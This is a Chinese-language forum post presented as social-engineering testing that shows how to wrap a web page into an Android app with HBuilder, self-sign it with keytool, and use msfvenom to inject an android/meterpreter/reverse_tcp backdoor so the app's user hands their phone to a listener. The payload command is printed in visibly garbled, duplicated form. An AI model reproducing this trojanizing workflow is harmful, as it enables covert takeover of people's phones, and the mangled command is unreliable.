搜索
查看: 5054|回复: 0

浅谈Shell的伪装的艺术

[复制链接]

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-11-25 11:44:32 | 显示全部楼层 |阅读模式 来自 甘肃
[md]> 在网络安全中,`社会工程学` 已经是一种最为致命的测试手段。常常让人出其不意,今天来看看如何利用 `Shell伪装的艺术` 来进行社会工程学测试。

[![伪装的艺术](https://blog.bbskali.cn/usr/uploads/2020/11/1757253254.jpg "伪装的艺术")](https://blog.bbskali.cn/usr/uploads/2020/11/1757253254.jpg)

<figcaption class="post-img-figcaption"><a class="light-link" data-fancybox="gallery" no-pjax="" data-type="image" data-caption="伪装的艺术" href="https://blog.bbskali.cn/usr/uploads/2020/11/1757253254.jpg">伪装的艺术</a></figcaption>

### 对安卓 shell 的伪装

利用 `HBuilder` 将 Web 页面打包成 `APP`
`文件`-`新建`-`移动APP`
配置 APP 项目
[![](https://blog.bbskali.cn/usr/uploads/2020/11/3956978859.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/3956978859.jpg)

<figcaption class="post-img-figcaption"></figcaption>

需要注意是 `页面入口` 便是 APP 启动后要进入的页面。

### 设置图标

[![](https://blog.bbskali.cn/usr/uploads/2020/11/1540892431.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/1540892431.jpg)

<figcaption class="post-img-figcaption"></figcaption>

需要注意的是图标格式为 `PNG`

### 设置启动页

[![](https://blog.bbskali.cn/usr/uploads/2020/11/3662465916.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/3662465916.jpg)

<figcaption class="post-img-figcaption"></figcaption>

### 打包 APP

`右键项目`-`发行`-`发行原生APP`
[![](https://blog.bbskali.cn/usr/uploads/2020/11/1703045648.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/1703045648.jpg)

<figcaption class="post-img-figcaption"></figcaption>

**关于签名**
如果你不懂关于 androdi 的前面,建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书!

### 自建证书

在 `Kali` 下我们利用下面命令建立证书。

```-bash
keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore
```

Bash

<button><i class="fontello fontello-tags" id="btn-copy-code"><span>&#160;</span>复制</i></button>

这样我们便创建了一个名为 `kali.keystore` 的证书,输入证书的密码,位置等信息打包即可!

[![](https://blog.bbskali.cn/usr/uploads/2020/11/2480701655.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/2480701655.jpg)

<figcaption class="post-img-figcaption"></figcaption>

### 获取 app

在 `发行`-`查看APP打包状态` 获取已经打包好的 app
[![](https://blog.bbskali.cn/usr/uploads/2020/11/1529860502.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/1529860502.jpg)

<figcaption class="post-img-figcaption"></figcaption>

### 添加后门

```-bash
msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk=192.168.232.195 LPORT=5555 R > kali1.apk192.168.232.195 LPORT=5555 R > kali1.apk=5555 R > kali1.apk5555 R > kali1.apk> kali1.apk kali1.apk
```

Bash

<button><i class="fontello fontello-tags" id="btn-copy-code"><span>&#160;</span>复制</i></button>

**参数说明:**
`-x` 原生 APP
`kali1.apk` 最后生成含有后门的 app

### 安装 app

[![](https://blog.bbskali.cn/usr/uploads/2020/11/1675337827.jpg)](https://blog.bbskali.cn/usr/uploads/2020/11/1675337827.jpg)

<figcaption class="post-img-figcaption"></figcaption>

### 运行 app

<video src="https://you.bbskali.cn/MP4/dabiaoge.mp4" poster="https://blog.bbskali.cn/usr/uploads/2020/11/2640370664.jpg" <="" video="" preload="preload" controls="controls"></video>

就这样,当你还在不断的欣赏小视频的同时,别人就会得到你手机的权限。
[![运行 app 后 获得 shell](https://blog.bbskali.cn/usr/uploads/2020/03/2045864825.png "运行app后 获得shell")](https://blog.bbskali.cn/usr/uploads/2020/03/2045864825.png)

<figcaption class="post-img-figcaption"><a class="light-link" data-fancybox="gallery" no-pjax="" data-type="image" data-caption="运行app后 获得shell" href="https://blog.bbskali.cn/usr/uploads/2020/03/2045864825.png">运行app后 获得shell</a></figcaption>

需要注意的是,由于 kali 的版本不同或者 Java 版本问题的差异,在实际中你可能会遇到各种坑。但是不要放弃总会成功的!
[/md]
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表